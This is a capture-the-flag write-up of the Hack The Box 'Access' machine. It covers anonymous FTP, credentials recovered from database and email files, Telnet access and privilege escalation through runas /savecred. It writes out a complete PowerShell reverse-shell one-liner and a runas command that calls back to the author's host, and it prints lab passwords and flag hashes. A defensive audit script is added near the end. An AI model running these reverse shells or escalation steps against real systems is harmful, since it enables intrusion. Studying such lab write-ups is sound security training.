Access-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous FTP access, viewing .mdb files, viewing .pst files, logging in to the Telnet service with a user account, PowerShell reverse shell, enumerating the administrator's password policy, switching users with runas

Reference: https://www.jgeek.cn/article/69

0x01 Getting user-level access

1. Get the target's IP address: 10.10.10.98

2. Find out which ports the target has open

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.98
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:27 CST
Nmap scan report for 10.10.10.98
Host is up (0.48s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 16.17 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,23,80 -sC -sV --min-rate=1000 10.10.10.98
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:42 CST
Nmap scan report for 10.10.10.98
Host is up (1.5s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
23/tcp open telnet Microsoft Windows XP telnetd
| telnet-ntlm-info:
| Target_Name: ACCESS
| NetBIOS_Domain_Name: ACCESS
| NetBIOS_Computer_Name: ACCESS
| DNS_Domain_Name: ACCESS
| DNS_Computer_Name: ACCESS
|_ Product_Version: 6.1.7600
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: -8h03m35s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.38 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.98 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 22:44 CST
Nmap scan report for 10.10.10.98
Host is up (0.63s latency).
All 65535 scanned ports on 10.10.10.98 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 21.60 seconds

3. Not many ports are open. There was a big pitfall here: whoever attacked this box before me had broken FTP, so I could not find an entry point for a long time. I was starting to doubt myself: an easy box, after more than 100 machines, and I still can't find the entry point???

┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
ftp: Can't connect to `10.10.10.98:49158': 连接超时
421 Service not available, remote server has closed connection.
229 Entering Extended Passive Mode (|||49158|)
ftp> exit

4. After resetting the box, FTP came back to normal. Port 80 is just a web page with no information at all, only a photo from a camera's point of view.

http://10.10.10.98/

5. FTP allows anonymous login; I copied all the files down first using a GUI client.

6. I tried john and hashcat to crack the zip archive's password; it must be fairly complex, because I never cracked it.

┌──(kali㉿offsec)-[~/Desktop]
└─$ zip2john Access\ Control.zip > zip.hash

7. Looking at the .mdb file, however, turned up some account and password information

admin
engineer
backup_admin

admin
access4u@security
admin

John
Mark
Sunita
Mary
Monica

8. Using this password, I extracted the archive above: access4u@security

9. The file Access Control.pst should be an Outlook data file, so it looks like I need to go through email. Since I didn't want to load it directly into my own Outlook, I used the following tool to recover it temporarily and take a look: BitRecover PST Viewer

10. It did reveal quite a lot of information

8/24/2018 7:44:00 AM


MegaCorp Access Control System "security" account


Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.

Regards,

John

john@megacorp.com

'security@accesscontrolsystems.com'

11. From the email we learn the default account credentials

security

4Cc3ssC0ntr0ller

12. After trying them, these are indeed this user's credentials

┌──(kali㉿offsec)-[~/Desktop]
└─$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

C:\Users\security>dir-
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F

Directory of C:\Users\security

08/23/2018 11:52 PM <DIR> .
08/23/2018 11:52 PM <DIR> ..
08/24/2018 08:37 PM <DIR> .yawcam
08/21/2018 11:35 PM <DIR> Contacts
08/28/2018 07:51 AM <DIR> Desktop
08/21/2018 11:35 PM <DIR> Documents
08/21/2018 11:35 PM <DIR> Downloads
08/21/2018 11:35 PM <DIR> Favorites
08/21/2018 11:35 PM <DIR> Links
08/21/2018 11:35 PM <DIR> Music
08/21/2018 11:35 PM <DIR> Pictures
08/21/2018 11:35 PM <DIR> Saved Games
08/21/2018 11:35 PM <DIR> Searches
08/24/2018 08:39 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 3,347,705,856 bytes free

C:\Users\security>

13. Then let's grab the initial flag

C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F

Directory of C:\Users\security\Desktop

08/28/2018 07:51 AM <DIR> .
08/28/2018 07:51 AM <DIR> ..
05/21/2024 08:40 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,347,705,856 bytes free

C:\Users\security\Desktop>type user.txt
2d8ccaf31bd74d0846f4a0ce8affd102

0x02 Getting system-level privileges

14. Because initial access to the box is over Telnet, where output is slow, I build a PowerShell reverse shell here to get a more stable session

C:\Users\security\Desktop>powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.45', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.98] 49157
SHELL> whoami
access\security
SHELL> pwd

Path

----

C:\Users\security\Desktop

SHELL>

15. From the initial foothold I wanted to run winpeas.exe directly, but a policy restriction prevented the tool from running, so I had to enumerate by hand

16. The key point is Password required No: logging on with this account does not require a password

C:\Users\security>net user administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 8/21/2018 10:01:12 PM
Password expires Never
Password changeable 8/21/2018 10:01:12 PM
Password required No
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/21/2024 8:40:32 AM

Logon hours allowed All

Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.


C:\Users\security>

17. The runas command: runas is a built-in Windows command that starts a program under a specified account and privilege level, instead of simply inheriting the parent process's privileges. What it actually relies on is credentials.

18. Run the reverse shell directly through runas to get administrator privileges

SHELL> copy \\10.10.14.45\share\Invoke-PowerShellTcp.ps1 p.ps1
SHELL> dir

Directory: C:\Users\security

Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 8/24/2018 8:37 PM .yawcam
d-r-- 8/21/2018 11:35 PM Contacts
d-r-- 5/21/2024 10:12 AM Desktop
d-r-- 8/21/2018 11:35 PM Documents
d-r-- 8/21/2018 11:35 PM Downloads
d-r-- 8/21/2018 11:35 PM Favorites
d-r-- 8/21/2018 11:35 PM Links
d-r-- 8/21/2018 11:35 PM Music
d-r-- 8/21/2018 11:35 PM Pictures
d-r-- 8/21/2018 11:35 PM Saved Games
d-r-- 8/21/2018 11:35 PM Searches
d-r-- 8/24/2018 8:39 PM Videos
-a--- 5/21/2024 6:30 PM 4402 p.ps1


SHELL> runas /user:ACCESS\Administrator /savecred "powershell -nop -exec bypass -file C:\Users\security\p.ps1"
SHELL>


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.98] 49163
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
access\administrator
PS C:\Windows\system32>
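As an added example that is not part of the original writeup, the following PowerShell audit script reports the two conditions this box chains together: local accounts with the PASSWD_NOTREQD flag set (what net user showed as "Password required No" in step 16) and credentials stored in Credential Manager (what runas /savecred silently reused in step 18). It assumes it is run from an account that can read local account flags; it only reports and prints suggested fixes, nothing is changed.

```powershell
# Added defensive audit (not from the writeup). Uses the ADSI WinNT provider
# rather than Get-LocalUser so it also runs on Windows 7 / Server 2008 R2,
# the generation of Windows this box reports (Product_Version 6.1.7600).
$ADS_UF_ACCOUNTDISABLE = 0x0002   # userAccountControl bit: account disabled
$ADS_UF_PASSWD_NOTREQD = 0x0020   # userAccountControl bit: "Password required No"

function Get-PasswordNotRequiredAccount {
    $machine = [ADSI]"WinNT://$env:COMPUTERNAME,computer"
    foreach ($entry in $machine.Children) {
        if ($entry.SchemaClassName -ne 'user') { continue }
        $flags = [int]$entry.Properties['UserFlags'].Value
        if (-not ($flags -band $ADS_UF_PASSWD_NOTREQD)) { continue }
        [pscustomobject]@{
            Name    = $entry.Name
            Enabled = -not ($flags -band $ADS_UF_ACCOUNTDISABLE)
            # Suggested remediation command (printed, not executed)
            Fix     = "net user `"$($entry.Name)`" /passwordreq:yes"
        }
    }
}

function Get-CachedCredentialTarget {
    # cmdkey /list prints one "Target: <name>" line per stored credential;
    # these are exactly the entries runas /savecred can pick up.
    cmdkey /list 2>$null | ForEach-Object {
        if ($_ -match '^\s*Target:\s*(.+)$') { $Matches[1].Trim() }
    }
}

$weak = @(Get-PasswordNotRequiredAccount)
if ($weak.Count) {
    Write-Warning "Local accounts that may log on without a password (PASSWD_NOTREQD set):"
    $weak | Format-Table -AutoSize
} else {
    Write-Host "No local account has PASSWD_NOTREQD set."
}

$cached = @(Get-CachedCredentialTarget)
if ($cached.Count) {
    Write-Warning "Credential Manager holds $($cached.Count) saved credential(s):"
    $cached | ForEach-Object { "  $_" }
    # Hardening note: the policy "Network access: Do not allow storage of passwords
    # and credentials for network authentication" (DisableDomainCreds = 1) blocks
    # this kind of saving; review its impact on legitimate saved logons first.
} else {
    Write-Host "Credential Manager holds no saved credentials."
}
```

Run it from an elevated PowerShell prompt so that cmdkey reports the same credential store an attacker in that session would see.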

19. Get the final flag

PS C:\Windows\system32> cd C:/Users/administrator/Desktop
PS C:\Users\administrator\Desktop> dir


Directory: C:\Users\administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 5/21/2024 8:40 AM 34 root.txt


PS C:\Users\administrator\Desktop> cat root.txt
8983760b12a9d9aa1a137350431800b6
PS C:\Users\administrator\Desktop>

20. If the box had been able to run winpeas.exe, it probably would have been a direct privilege escalation; instead, I had to escalate through runas...

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/156


https://sh1yan.top/2024/05/22/Access-htb-writeup/
Author: shiyan
Published: May 22, 2024